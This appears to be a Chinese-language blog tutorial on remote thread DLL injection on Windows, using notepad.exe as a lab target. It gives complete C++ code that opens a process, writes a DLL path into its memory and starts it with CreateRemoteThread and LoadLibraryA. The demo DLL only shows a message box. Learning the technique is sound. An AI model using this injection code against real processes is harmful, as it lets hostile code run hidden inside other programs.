远程线程注入
远程线程注入是最基础的一种注入方式,因为其调用了CreateRemoteThread()函数而得名。但是因为其是最基础的注入方式,调用了windows API而特征明显,所以非常容易被检测出来。
这次的实验对象是notepad.exe
#include <Windows.h>
#include <stdio.h>
#include <TlHelp32.h>
#include <iostream>
using namespace std;
BOOL CreateRemoteThreadInjectDll(DWORD dwProcessId, char* pszDllFileName);
DWORD find_process(char* process_name);
int main() {
char* dllPath = "C:\\Users\\w\\source\\repos\\QuickDll\\x64\\Debug\\QuickDll.dll";
char* process = "notepad.exe";
DWORD process_id = find_process(process);
if (process_id != 0)printf("%s process_id is %d\n",process, process_id);
BOOL b = CreateRemoteThreadInjectDll(process_id, dllPath);
cout << b;
return 0;
}
首先是一个大致的框架,下面就一个一个讲解
DWORD find_process(char* process_name) {
PROCESSENTRY32 process_entry;
process_entry.dwSize = sizeof(PROCESSENTRY32);
//get the list of processes
HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
//check processes to find TARGET_PROCESS_NAME
if (Process32First(snapshot, &process_entry) == TRUE) {
while (Process32Next(snapshot, &process_entry) == TRUE) {
if (stricmp(process_entry.szExeFile, process_name) == 0) {
cout << "process_entry.szExeFile is" << *process_entry.szExeFile << endl;
CloseHandle(snapshot);
return process_entry.th32ProcessID;
}
}
}
CloseHandle(snapshot);
return 0;
}
首先最先用到的是find_process(char* process_name)函数,因为我们是要把我们写好的DLL注入到远程线程里。所以要先找到进程❗注意是进程不是线程哦。
CreateToolhelp32Snapshot函数会保存当时进程的快照
剩下的应该没啥好说的了可读性还是蛮好的,就是记得关闭句柄CloseHandle(snapshot)
接下来就是注入了
BOOL CreateRemoteThreadInjectDll(DWORD dwProcessId,char* pszDllFileName) {
HANDLE hProcess = NULL;
SIZE_T dwSize = 0;
LPVOID pDllAddr = NULL;
FARPROC pFuncProcAddr = NULL;
// 打开注入的进程
hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessId);
if (NULL == hProcess) {
printf("Error OpenProcess,%d", GetLastError());
return FALSE;
}
// 在注入进程中申请内存
dwSize = 1 + strlen(pszDllFileName);
pDllAddr = VirtualAllocEx(hProcess, NULL, dwSize, MEM_COMMIT, PAGE_READWRITE);
if (pDllAddr == NULL) {
printf("Error VirtualAllocEx,%d", GetLastError());
return FALSE;
}
// 向申请的内存中写入数据
if (FALSE == WriteProcessMemory(hProcess, pDllAddr, pszDllFileName, dwSize, NULL)) {
printf("Error WriteProcessMemory,%d", GetLastError());
return FALSE;
}
// 获取LoadLibraryA函数地址
pFuncProcAddr = GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA");
if (NULL == pFuncProcAddr) {
printf("Error GetProcAddress,%d", GetLastError());
return FALSE;
}
// CreateRemoteThreadc创建远程线程,实现dll注入
HANDLE hRemoteThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pFuncProcAddr, pDllAddr, 0, NULL);
if (NULL == hRemoteThread) {
printf("Error CreateRemoteThread,%d", GetLastError());
return FALSE;
}
CloseHandle(hProcess);
return TRUE;
}
这代码可读性太好了以至于我实在不知道该怎么讲?就把各个可能不熟悉的API文档放进来吧
- OpenProcess | Microsoft Docs
- VirtualAllocEx | Microsoft Docs
- WriteProcessMemory | Microsoft Docs
- GetProcAddress | Microsoft Docs
- CreateRemoteThread function (processthreadsapi.h) - Win32 apps | Microsoft Docs
然后DLL也是非常的简单
#include "pch.h"
extern "C" __declspec(dllexport) void HelloWorld();
//核心入口函数 DLL入口函数
BOOL APIENTRY DllMain( HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH://当DLL被进程加载时
HelloWorld();
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
void HelloWorld()
{
MessageBox(NULL, "Success", "Message", MB_YESNO);
}
稍微能讲一讲的就只有extern "C" __declspec(dllexport) void HelloWorld();了
这是通过C的方式编译,因为通过C++ 编译出来的函数名有点奇怪。但是跟本篇又没啥关系。感兴趣的话自行百度扩展一下吧。
